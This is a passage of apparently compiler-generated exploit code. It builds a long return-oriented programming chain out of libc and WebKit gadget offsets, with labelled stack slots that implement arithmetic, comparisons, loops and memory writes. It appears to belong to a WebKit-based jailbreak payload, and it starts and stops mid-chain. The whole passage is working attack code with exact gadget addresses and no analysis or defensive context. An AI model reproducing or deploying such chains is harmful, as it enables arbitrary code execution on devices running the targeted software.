set_gadget(libc_base+144605,); //pop rdi
//L7165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7166:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+352144, //L7168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+352192, //L7171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+352160, //L7169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7168:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7169:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7170:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7171:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+352304, //L7172+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+352296, //L7172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7172:
db([0, 0]); // 0x0
set_gadgets([
ropchain+352320, //L7172+24
ropchain+354352, //L7167
libc_base+764760, //pop rsi
ropchain+352360, //L7173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7173:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7175:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+352480, //L7178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+352464, //L7176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7176:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7178:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+352656, //L7181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+352672, //L7182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+352624, //L7179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+352640, //L7180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7179:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7180:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7182:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+352768, //L7184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+352752, //L7183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7183:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7184:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7185:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L7186:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L7187:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+352968, //L7189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7189:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+353024, //L7190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7190:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+353160, //L7194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+353144, //L7193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7192:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7193:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7194:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+353224, //L7195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7195:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7197:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+353296, //L7198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7198:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7199:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+353392, //L7200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7200:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7202:
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+353512, //L7205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+353496, //L7203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7203:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7205:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+353688, //L7208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+353704, //L7209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+353656, //L7206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+353672, //L7207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7206:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7207:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7208:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7209:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+353816, //L7210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+353848, //L7212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+353832, //L7211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7210:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7211:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7212:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+354008, //L7214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+354024, //L7215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+353992, //L7213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7213:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7214:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7215:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+354184, //L7219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+354152, //L7217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+354168, //L7218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7216:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7217:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7218:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7219:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+354248, //L7220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7220:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7222:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+354328, //L7224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7224:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+355112, //L7223
//L7167:
libc_base+764760, //pop rsi
ropchain+354392, //L7226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7226:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7228:
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+354512, //L7231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+354496, //L7229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7229:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7231:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+354688, //L7234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+354704, //L7235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+354656, //L7232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+354672, //L7233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7232:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7233:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7234:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7235:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+354784, //L7236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+354800, //L7237
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7236:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7237:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+354960, //L7241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+354928, //L7239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+354944, //L7240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7238:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7241:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+355024, //L7242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7242:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7244:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+355104, //L7245
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7245:
db([0, 0]); // 0x0
//L7223:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+355152, //L7247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7247:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7249:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+355272, //L7252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+355256, //L7250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7250:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7252:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+355416, //L7255
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+355384, //L7253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+355400, //L7254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7253:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7254:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7255:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+355504, //L7257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7256:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L7257:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+355560, //L7258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7258:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7260:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+355640, //L7262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7262:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L7113:
//L7062:
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+355736, //L7264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7263:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7264:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7265:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+355816, //L7266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7266:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7268:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7270:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+355976, //L7273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+355960, //L7271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7271:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7273:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+356056, //L7274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+356072, //L7275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7274:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7275:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+356232, //L7279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+356200, //L7277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+356216, //L7278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7276:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7277:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7278:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7279:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+356288, //L7281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7281:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+356416, //L7283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+356432, //L7284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+356400, //L7282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7282:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7283:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7284:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+356592, //L7288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+356560, //L7286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+356576, //L7287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7285:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7286:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7287:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7288:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+356648, //L7290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7290:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+356776, //L7292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+356792, //L7293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+356760, //L7291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7291:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7292:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7293:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+356952, //L7297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+356920, //L7295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+356936, //L7296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7294:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7295:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7296:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7297:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+357008, //L7299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7299:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+357136, //L7301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+357152, //L7302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+357120, //L7300
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7300:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7301:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7302:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+357232, //L7303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+357248, //L7304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7303:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7304:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+357344, //L7306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+357328, //L7305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7305:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7306:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+357424, //L7307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7307:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7308:
db([46, 0]); // 0x2e
set_gadget(libc_base+144605,); //pop rdi
//L7309:
db([46, 0]); // 0x2e
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+357568, //L7310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+357600, //L7312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+357584, //L7311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7310:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7311:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7312:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+357768, //L7314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+357784, //L7315
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+357752, //L7313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7313:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7314:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7315:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+357896, //L7317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+357944, //L7320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+357912, //L7318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7317:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7318:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7319:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7320:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
